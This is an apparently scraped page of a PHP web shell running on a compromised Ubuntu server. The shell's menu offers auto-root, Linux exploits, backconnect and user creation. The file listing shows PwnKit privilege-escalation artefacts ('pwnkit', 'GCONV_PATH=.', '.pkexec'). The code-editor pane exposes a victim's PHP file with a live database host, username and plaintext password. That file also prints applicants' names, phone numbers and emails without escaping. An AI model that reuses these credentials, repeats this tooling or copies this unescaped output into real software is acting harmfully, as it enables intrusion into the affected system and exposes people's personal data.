Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.191.147.146
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
tadabills /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
libs
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
.tadabills.php
3.61
KB
-rw-r--r--
Registrationpage.html
5.54
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
barcode_test.php
1.8
KB
-rwxr-xr-x
cconfig.php
1.57
KB
-rwxr-xr-x
getdata.php
3.25
KB
-rwxr-xr-x
index.html
36.1
KB
-rwxr-xr-x
index_old.html
4.82
KB
-rwxr-xr-x
loginapp.php
1.11
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
resume_det.php
2.59
KB
-rwxr-xr-x
resume_det_old.php
2.95
KB
-rwxr-xr-x
resume_det_old1.php
1.73
KB
-rwxr-xr-x
secondtadabill.html
14.96
KB
-rw-r--r--
update.php
740
B
-rwxr-xr-x
upload_file.php
763
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : resume_det_old.php
<?php $servername = "logisys.cluster-cv9maxyrxjgg.ap-south-1.rds.amazonaws.com"; $username = "admin"; $password = "Logisys2104"; $conn = new mysqli($servername,$username,$password); if(!$conn) { die("Connection failed: " . mysqli_connect_error()); } $db = "logisys3_comexam"; $query = "SELECT * FROM {$db}.jobdet WHERE ifnull(fdeleted,'') <> 'T' group by fmobile order by fintdate desc"; //var_dump($query); $result = mysqli_query($conn, $query); $count = mysqli_num_rows($result); //<center><h1>'.$row1['funivname'].'</h1><h2>Final Time Table of UG Courses MAY / JUNE 2019 Examination</center></h2><center> $table = ' <table style="margin-left:2px;text-align: left;width: 60%;font-size:14px;margin: auto;" align-self="middle" cellspacing="1" cellpadding="5" border="0" align="center" bgcolor="#505151"> <thead> <tr style = "background-color:#8acc51"> <th width="8%"><center>Sl. No.</center></th> <th width="15%"><center>Name</center></th> <th><center>Mobile No.</center></th> <th><center>Email Id</center></th> <th><center>Preferred Location</center></th> <th><center>Applied Date</center></th> <th width="25%"><center>Resume</center></th> </tr> </thead>'; $i = 0; if($count > 0) { while($row = mysqli_fetch_assoc($result)) { $table .= "<tr bgcolor='#ffffff' >"; $table .= "<td><center>".++$i."</center></td>"; $table .= "<td>".$row['fname']."</td>"; $table .= "<td>".$row['fmobile']."</td>"; $table .= "<td>".$row['femail']."</td>"; $table .= "<td>".$row['fpreferloc']."</td>"; $table .= "<td>".$row['fintdate']."</td>"; $table .= "<td><a href='resumes/".$row['frespath']."' target = 'blank'>Resume</a></td>"; $table .= "</tr>"; } } else { $table .= "<tr bgcolor='#ffffff' >"; $table .= "<td colspan='4'><center>No data found</center></td>"; } // $subject = "{$row['funivname']} Statistics as on ".$row['fdate']; echo $table; function moneyFormatIndia($num) { $explrestunits = "" ; if(strlen($num)>3) { $lastthree = substr($num, strlen($num)-3, strlen($num)); $restunits = substr($num, 0, strlen($num)-3); // extracts the last three digits $restunits = (strlen($restunits)%2 == 1)?"0".$restunits:$restunits; // explodes the remaining digits in 2's formats, adds a zero in the beginning to maintain the 2's grouping. $expunit = str_split($restunits, 2); for($i=0; $i<sizeof($expunit); $i++) { // creates each of the 2's group and adds a comma to the end if($i==0) { $explrestunits .= (int)$expunit[$i].","; // if is first value , convert into integer } else { $explrestunits .= $expunit[$i].","; } } $thecash = $explrestunits.$lastthree; } else { $thecash = $num; } return $thecash; // writes the final format where $currency is the currency symbol. } ?>
Close